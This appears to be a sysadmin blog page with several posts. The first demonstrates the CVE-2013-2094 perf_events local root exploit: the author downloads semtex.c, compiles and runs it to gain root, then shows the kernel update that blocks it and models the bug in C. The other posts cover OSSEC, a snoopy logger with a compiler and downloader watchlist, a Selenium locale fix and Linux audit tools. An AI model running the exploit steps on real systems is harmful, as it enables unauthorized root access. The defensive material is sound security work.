dinçer salih kurnaz
Tech. Consultant,
Platform independent senior system administrator.
Servers/Hardware,
Operating Systems/Applications,
Storage,
Networking,
IT Security,
Virtualization,
Cloud Computing/Cloud Management,
Linux
Oracle

Linux PERF_EVENTS Local Root

Linux local root exploit CVE-2013-2094

dincer@debian:~$ uname -a

Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.39-2 x86_64 GNU/Linux

dincer@debian:~$ cat /etc/issue

Debian GNU/Linux 7.0 \n \l

 

dincer@debian:~$ id dincer

uid=1004(dincer) gid=1002(dincer) groups=1002(dincer)

dincer@debian:~$ wget http://dl.packetstormsecurity.net/1305-exploits/semtex.c

dincer@debian:~$ gcc -O2 semtex.c && ./a.out

2.6.37-3.x x86_64

sd@fucksheep.org 2010

root@debian:~#  TA TAAA :)

root@debian:~# id

uid=0(root) gid=0(root) groups=0(root),1002(dincer)

Precaution:

There should be no compiler installed on the system! That only raises the bar, though: an attacker can compile semtex.c elsewhere and copy in a static binary, so treat it as defence in depth, not a fix.

Fix:

Update Debian.

dincer@debian:~$ uname -a

Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.41-2+deb7u2 x86_64 GNU/Linux

dincer@debian:~$ ./a.out

a.out: semtex.c:51: sheep: Assertion `!close(fd)' failed.

Aborted
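Why the updated kernel kills it: on 3.2.41-2+deb7u2 perf_event_open() rejects the oversized config and returns -1, so the exploit's close(fd) fails with EBADF and its own assertion (semtex.c line 51) aborts it. The model below is an added example, not the kernel's or the exploit's code: it reproduces the bug in perf_swevent_init() (kernel/events/core.c), where the 64-bit attr.config was stored in an int before the bounds check, so a value such as 0xffffffffffffffff became -1, passed the check and was later used as a negative index into perf_swevent_enabled[]. The fix made the variable u64. PERF_COUNT_SW_MAX is assumed to be 9, the 3.2-era value.

```c
/* Model of the integer-width bug behind CVE-2013-2094 (added example,
 * simplified; not the kernel's code).  perf_swevent_init() stored the
 * 64-bit attr.config in an int before range-checking it, so a huge config
 * became a small or negative index into perf_swevent_enabled[]. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define PERF_COUNT_SW_MAX 9   /* assumption: number of software events on a 3.2 kernel */

/* Vulnerable: attr.config truncated to int before the range check.
 * (Out-of-range conversion to int is implementation-defined; gcc/clang
 * keep the low 32 bits, which is what the exploit relies on.) */
int sw_event_index_vulnerable(uint64_t config, long *index) {
    int event_id = (int)config;          /* low 32 bits, sign-interpreted */
    if (event_id >= PERF_COUNT_SW_MAX)    /* signed compare: negatives pass */
        return -ENOENT;
    *index = event_id;                   /* used as array index -> OOB if negative */
    return 0;
}

/* Fixed: compare the full 64-bit value, as the upstream patch does. */
int sw_event_index_fixed(uint64_t config, long *index) {
    uint64_t event_id = config;
    if (event_id >= PERF_COUNT_SW_MAX)
        return -ENOENT;
    *index = (long)event_id;
    return 0;
}

int main(void) {
    const uint64_t probes[] = {
        2,                      /* PERF_COUNT_SW_PAGE_FAULTS: legitimate */
        0xffffffffffffffffULL,  /* int -1: accepted by the buggy check */
        0xffffffff80000000ULL,  /* int INT_MIN: accepted, index far below the array */
        0x100000000ULL,         /* only bit 32 set: silently becomes event 0 */
    };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        long v = 0, f = 0;
        int rv = sw_event_index_vulnerable(probes[i], &v);
        int rf = sw_event_index_fixed(probes[i], &f);
        printf("config=%#018llx  vulnerable:%s index=%ld  fixed:%s\n",
               (unsigned long long)probes[i],
               rv ? "reject" : "accept", v,
               rf ? "reject" : "accept");
    }
    return 0;
}
```

The exploit passes a config whose int interpretation is negative, so the increment of perf_swevent_enabled[event_id] lands outside the array; the fixed check rejects every value of 9 or above before any indexing happens.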



Debian Ossec

* What is OSSEC

log monitoring

file integrity checking

rootkit detection

active response

* Let's install it (OSSEC 2.7 is built from source, so build-essential brings gcc onto the box; given the previous post's precaution, remove it again once the install is done)

root@debian:~# aptitude install build-essential

root@debian:~# wget http://www.ossec.net/files/ossec-hids-2.7.tar.gz

root@debian:~# tar zxvf ossec-hids-2.7.tar.gz

root@debian:~# cd ossec-hids-2.7/

root@debian:~/ossec-hids-2.7# ./install.sh

en

server

y

y

y

- To start OSSEC HIDS:

                /var/ossec/bin/ossec-control start

 - To stop OSSEC HIDS:

                /var/ossec/bin/ossec-control stop

 - The configuration can be viewed or modified at /var/ossec/etc/ossec.conf

/var/ossec/bin/manage_agents

* Let's start it

root@debian:/var/ossec# /var/ossec/bin/ossec-control start

Starting OSSEC HIDS v2.7 (by Trend Micro Inc.)...

Started ossec-maild...

Started ossec-execd...

Started ossec-analysisd...

Started ossec-logcollector...

Started ossec-remoted...

Started ossec-syscheckd...

Started ossec-monitord...

Completed.

* Let's check.

root@debian:/var/ossec# ls

active-response  agentless  bin  etc  logs  queue  rules  stats  tmp  var

root@debian:/var/ossec# vi /var/ossec/etc/ossec.conf

root@debian:/var/ossec# cat /etc/passwd

ossec:x:1001:1001::/var/ossec:/bin/false

ossecm:x:1002:1001::/var/ossec:/bin/false

ossecr:x:1003:1001::/var/ossec:/bin/false

root@debian:/var/ossec# ps aux | grep ossec

ossecm   11037  0.0  0.1  16892   544 ?        S    16:20   0:00 /var/ossec/bin/ossec-maild

root     11041  0.0  0.1  12556   520 ?        S    16:20   0:00 /var/ossec/bin/ossec-execd

ossec    11045  0.2  0.4  14384  2428 ?        S    16:20   0:00 /var/ossec/bin/ossec-analysisd

root     11047  0.0  0.1   4308   548 ?        S    16:20   0:00 /var/ossec/bin/ossec-logcollector

root     11060  0.0  0.0   4472   488 ?        S    16:20   0:00 /var/ossec/bin/ossec-syscheckd

ossec    11064  0.0  0.1  12816   520 ?        S    16:20   0:00 /var/ossec/bin/ossec-monitord

ossecm   11075  0.0  0.0      0     0 ?        Z    16:20   0:00 [ossec-maild] <defunct>

root@debian:/var/ossec# /var/ossec/bin/agent_control -r -a

* Let's test it.

root@debian:/var/ossec# logger "Segmentation Fault"

"Segmentation Fault" is on the BAD_WORDS list that rule 1002 matches, so the alert should show up in /var/ossec/logs/alerts/alerts.log. It is level 2, below the default email_alert_level of 7, so no mail is sent for it.

syscheck and rootcheck scan (agent 000 is the server itself):

root@debian:/var/ossec# /var/ossec/bin/agent_control -r -u 000



Installing Snoopy Logger on Debian Linux

This tool can record every execve() call made on the system to a log file. It works as an LD_PRELOAD library (/etc/ld.so.preload), so it only sees dynamically linked programs; statically linked binaries, and anyone who can edit ld.so.preload, bypass it.

https://github.com/renard/snoopylogger

Let's start the installation.

root@debian:~# cat /etc/issue

Debian GNU/Linux 7.0 \n \l

root@debian:~# uname -a

Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.41-2 x86_64 GNU/Linux

root@debian:~# aptitude install snoopy

Install snoopy library to /etc/ld.so.preload? 

[ Yes ]

root@debian:~# dpkg -S snoopy

snoopy: /usr/share/lintian/overrides/snoopy

snoopy: /usr/share/doc/snoopy

snoopy: /usr/share/doc/snoopy/copyright

snoopy: /usr/share/doc/snoopy/changelog.gz

snoopy: /usr/share/doc/snoopy/README.Debian

snoopy: /usr/share/doc/snoopy/README

snoopy: /usr/share/doc/snoopy/changelog.Debian.gz

snoopy: /usr/share/doc/snoopy/TODO

snoopy: /lib/snoopy.so

root@debian:~# reboot

Installation complete. (ld.so.preload only affects newly started processes, so shells that were already open are not logged until you log in again; the reboot above guarantees nothing pre-dates it.)

Let's test it.

root@debian:~# ls test

ls: cannot access test: No such file or directory

root@debian:~# ls deneme

ls: cannot access deneme: No such file or directory

root@debian:~# tail /var/log/auth.log

May 10 14:37:47 debian snoopy[2905]: [uid:0 sid:2771 tty:/dev/pts/0 cwd:/root filename:/bin/ls]: ls test

May 10 14:37:51 debian snoopy[2906]: [uid:0 sid:2771 tty:/dev/pts/0 cwd:/root filename:/bin/ls]: ls deneme

May 10 14:38:00 debian snoopy[2913]: [uid:0 sid:2771 tty:/dev/pts/0 cwd:/root filename:/usr/bin/tail]: tail /var/log/auth.log
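As an added example (not from this page or the snoopy project), here is a small C parser for the auth.log format above, with a rule that flags unprivileged users running a downloader or a compiler: the two tools the exploit session at the top of this page needed. The uid 0 lines are the ones from the test above; the uid 1004 lines and the sshd line are constructed to mirror that session. The watchlist, the min_uid threshold of 1000 and the function names are this example's own choices.

```c
/* Added example (not from the page or the snoopy project): parse snoopy's
 * auth.log lines and flag unprivileged users running a downloader or a
 * compiler.  Sample input is constructed below. */
#include <stdio.h>
#include <string.h>

struct snoopy_event {
    int uid;
    int sid;
    char tty[64];
    char cwd[256];
    char filename[256];
    char cmd[512];
};

/* Parse "[uid:N sid:N tty:T cwd:D filename:F]: CMD" after the syslog prefix.
 * Returns 1 on success, 0 on a malformed or non-snoopy line.  Assumes tty,
 * cwd and filename contain no spaces, which is how snoopy 1.x emits them. */
int parse_snoopy_line(const char *line, struct snoopy_event *ev) {
    const char *p = strstr(line, "snoopy[");
    if (!p) return 0;
    p = strstr(p, "]: [uid:");
    if (!p) return 0;
    p += 4;                                  /* skip "]: [" */
    return sscanf(p, "uid:%d sid:%d tty:%63s cwd:%255s filename:%255[^]]]: %511[^\n]",
                  &ev->uid, &ev->sid, ev->tty, ev->cwd, ev->filename, ev->cmd) == 6;
}

/* Watchlist chosen for this example: compilers and downloaders. */
static const char *const watched_tools[] = {
    "gcc", "cc", "g++", "tcc", "make", "wget", "curl", NULL
};

/* 1 if the executed file's basename is on the watchlist. */
int is_watched_tool(const char *filename) {
    const char *base = strrchr(filename, '/');
    base = base ? base + 1 : filename;
    for (int i = 0; watched_tools[i]; i++)
        if (strcmp(base, watched_tools[i]) == 0)
            return 1;
    return 0;
}

/* Count (and print) lines where a user with uid >= min_uid ran a watched tool.
 * Lines that do not parse as snoopy output are skipped. */
int scan_snoopy_lines(const char *const *lines, size_t n, int min_uid) {
    int alerts = 0;
    for (size_t i = 0; i < n; i++) {
        struct snoopy_event ev;
        if (!parse_snoopy_line(lines[i], &ev))
            continue;
        if (ev.uid >= min_uid && is_watched_tool(ev.filename)) {
            printf("ALERT uid=%d tty=%s cwd=%s ran: %s\n", ev.uid, ev.tty, ev.cwd, ev.cmd);
            alerts++;
        }
    }
    return alerts;
}

/* Constructed sample: three lines from the page, two snoopy lines mirroring
 * the exploit session as uid 1004, and one non-snoopy line. */
static const char *const sample_lines[] = {
    "May 10 14:37:47 debian snoopy[2905]: [uid:0 sid:2771 tty:/dev/pts/0 cwd:/root filename:/bin/ls]: ls test",
    "May 10 14:37:51 debian snoopy[2906]: [uid:0 sid:2771 tty:/dev/pts/0 cwd:/root filename:/bin/ls]: ls deneme",
    "May 10 14:38:00 debian snoopy[2913]: [uid:0 sid:2771 tty:/dev/pts/0 cwd:/root filename:/usr/bin/tail]: tail /var/log/auth.log",
    "May 10 14:40:12 debian snoopy[2950]: [uid:1004 sid:2900 tty:/dev/pts/1 cwd:/home/dincer filename:/usr/bin/wget]: wget http://dl.packetstormsecurity.net/1305-exploits/semtex.c",
    "May 10 14:40:20 debian snoopy[2951]: [uid:1004 sid:2900 tty:/dev/pts/1 cwd:/home/dincer filename:/usr/bin/gcc]: gcc -O2 semtex.c",
    "May 10 14:40:21 debian sshd[2960]: Accepted publickey for dincer from 10.0.0.5 port 51234 ssh2",
};
#define SAMPLE_COUNT (sizeof sample_lines / sizeof sample_lines[0])

int main(void) {
    int n = scan_snoopy_lines(sample_lines, SAMPLE_COUNT, 1000);
    printf("%d alert(s)\n", n);
    return 0;
}
```

Run against the real file with the lines read from /var/log/auth.log instead of the constructed array; the parser deliberately ignores anything that is not a snoopy record, so it can be fed the whole log. Remember the caveat above: a static binary dropped on the box never passes through snoopy, so this catches the lazy path, not a determined one.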



Selenium Server, Java and the language problem

If the Windows box running Selenium Server is set to Turkish, sendKeys blows up. :(

I figured it out when I saw there was no problem on an English XP.

It has to be started like this, forcing an English locale and UTF-8 encoding for the JVM:

java -jar -Dfile.encoding=UTF8 -Duser.language=en -Duser.region=US selenium-server-standalone-2.32.0.jar -port 4450

The usual culprit with a Turkish locale is its case mapping of i/I (dotless ı and dotted İ), which breaks Java code that lowercases or uppercases strings without an explicit Locale. For the system properties themselves, see http://publib.boulder.ibm.com/infocenter/iseries/v5r4/index.jsp?topic=%2Frzaha%2Fsysprop2.htm



Squeaky-clean Linux

sudo aptitude install lynis chkrootkit rkhunter lsat yasat

sudo lsat

Starting LSAT...

Getting system information...

Running modules...

 Running checkpkgs module…

 Running checkinetd module…

Finished.

Check lsat.out for details.

sudo yasat -f

sudo lynis --check-all

sudo rkhunter --check

sudo chkrootkit

Areas that lynis --check-all covers (from the Lynis test list):

  • System tools: system binaries
  • Boot and services: boot loaders, startup services
  • Kernel: run level, loaded modules, kernel configuration, core dumps
  • Memory and processes: zombie processes, IO waiting processes
  • Users, groups and authentication: group IDs, sudoers, PAM configuration, password aging, default mask
  • Shells
  • File systems: mount points, /tmp files, root file system
  • Storage: usb-storage, firewire ohci
  • NFS
  • Software: name services: DNS search domain, BIND
  • Ports and packages: vulnerable/upgradable packages, security repository
  • Networking: nameservers, promiscuous interfaces, connections
  • Printers and spools: cups configuration
  • Software: e-mail and messaging
  • Software: firewalls: iptables, pf
  • Software: webserver: Apache, nginx
  • SSH support: SSH configuration
  • SNMP support
  • Databases: MySQL root password
  • LDAP services
  • Software: php: php options
  • Squid support
  • Logging and files: syslog daemon, log directories
  • Insecure services: inetd
  • Banners and identification
  • Scheduled tasks: crontab/cronjob, atd
  • Accounting: sysstat data, auditd
  • Time and synchronization: ntp daemon
  • Cryptography: SSL certificate expiration
  • Virtualization
  • Security frameworks: AppArmor, SELinux, grsecurity status
  • Software: file integrity
  • Software: malware scanners
  • Home directories: shell history files
